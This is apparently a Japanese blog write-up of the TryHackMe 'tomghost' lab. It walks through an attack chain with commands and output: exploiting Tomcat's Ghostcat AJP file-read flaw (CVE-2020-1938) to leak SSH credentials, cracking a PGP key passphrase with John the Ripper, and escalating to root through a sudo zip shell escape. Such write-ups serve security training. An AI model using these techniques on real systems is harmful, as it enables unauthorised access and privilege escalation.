はまやんはまやんはまやん

hamayanhamayan's blog

tomghost 解説 (Writeup) [TryHackMe]

f:id:hamayanhamayan:20210526174326p:plain

一部を■で隠しています。

第一段階:ユーザーシェル

いつものから始める。

$ export IP=[your IP]
$ nmap -sC -sV $IP
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30
$ gobuster dir -e -u http://$IP:8080 -w /usr/share/dirb/wordlists/common.txt
http://$IP:8080/docs (Status: 302)
http://$IP:8080/examples (Status: 302)
http://$IP:8080/favicon.ico (Status: 200)
http://$IP:8080/host-manager (Status: 302)
http://$IP:8080/manager (Status: 302)

tomcatのCVEを探してみると色々出てくるが、今回目立っているajpも関連して探していくとCVE-2020-1938が出てくる。

CVE-2020-1938

Tomcat-AJP脆弱性分析及び対応方法( CVE-2020-1938 ) | Cyberfortress
RCEできるっぽいがPoCが見つからない…LFIもできるみたいなので、そっちをとりあえずやりますか。
GitHub - YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi: Tomcat-Ajp协议文件读取漏洞

$ wget https://raw.githubusercontent.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py   
--2021-05-26 20:15:01--  https://raw.githubusercontent.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10884 (11K) [text/plain]
Saving to: ‘CNVD-2020-10487-Tomcat-Ajp-lfi.py’

CNVD-2020-10487-Tomcat-Ajp-lfi.py                100%[========================================================================================================>]  10.63K  --.-KB/s    in 0.008s   

2021-05-26 20:15:01 (1.24 MB/s) - ‘CNVD-2020-10487-Tomcat-Ajp-lfi.py’ saved [10884/10884]

$ python CNVD-2020-10487-Tomcat-Ajp-lfi.py $IP -p 8009 -f WEB-INF/web.xml
Getting resource at ajp13://$IP:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
        skyfuck:■■■■■■■■■■■■■
  </description>

</web-app>

取れてるっぽいし、認証情報っぽい文字列が書いてある。

SSHでつないでみよう

skyfuck@ubuntu:~$ find / -name "user.txt" 2>/dev/null
/home/merlin/user.txt
skyfuck@ubuntu:~$ cat /home/merlin/user.txt
■■■■■■■■■■■■■■

普通に取れましたね。

第二段階:権限昇格

linpeas.shをやってみる

とくに怪しいものはないけど…

[+] Searching PGP/GPG
PGP/GPG files found:
-rw-rw-r-- 1 skyfuck skyfuck 394 Mar 10  2020 /home/skyfuck/credential.pgp

PGP/GPG software:
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

珍しいのはこれくらいか。

$ ls -la
total 44
drwxr-xr-x 4 skyfuck skyfuck 4096 May 26 04:25 .
drwxr-xr-x 4 root    root    4096 Mar 10  2020 ..
-rw------- 1 skyfuck skyfuck  136 Mar 10  2020 .bash_history
-rw-r--r-- 1 skyfuck skyfuck  220 Mar 10  2020 .bash_logout
-rw-r--r-- 1 skyfuck skyfuck 3771 Mar 10  2020 .bashrc
drwx------ 2 skyfuck skyfuck 4096 May 26 04:18 .cache
-rw-rw-r-- 1 skyfuck skyfuck  394 Mar 10  2020 credential.pgp
drwx------ 2 skyfuck skyfuck 4096 May 26 04:25 .gnupg
-rw-r--r-- 1 skyfuck skyfuck  655 Mar 10  2020 .profile
-rw-rw-r-- 1 skyfuck skyfuck 5144 Mar 10  2020 tryhackme.asc

credential.pgpの復号化をやりたいがパスワードが分からない。
tryhackme.ascを見るとPGP鍵になっている。
John The Ripperでクラックしてみよう。

$ scp skyfuck@$IP:tryhackme.asc tryhackme.asc
skyfuck@$IP's password:
tryhackme.asc                                                           
$ john hash.txt --wordlist=/usr/share/dirb/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
■■■■■■■        (tryhackme)
1g 0:00:00:00 DONE (2021-05-26 20:34) 4.166g/s 4466p/s 4466c/s 4466C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed

あっという間に出てくる。

$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: key C6707170: public key "tryhackme <stuxnet@tryhackme.com>" imported
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
merlin:■■■■■■■■■■■■■■■■■■■■■■

ログインからSUDOからの権限昇格

zip | GTFOBinsで行けそう。

$ ssh merlin@$IP
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -la
total 32
drwx------  4 root root 4096 Mar 10  2020 .
drwxr-xr-x 22 root root 4096 Mar 10  2020 ..
-rw-------  1 root root   15 Mar 10  2020 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4096 Mar 10  2020 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   17 Mar 10  2020 root.txt
drwxr-xr-x  2 root root 4096 Mar 10  2020 ufw
# cat root.txt
■■■■■■■■■■■■■■

ok.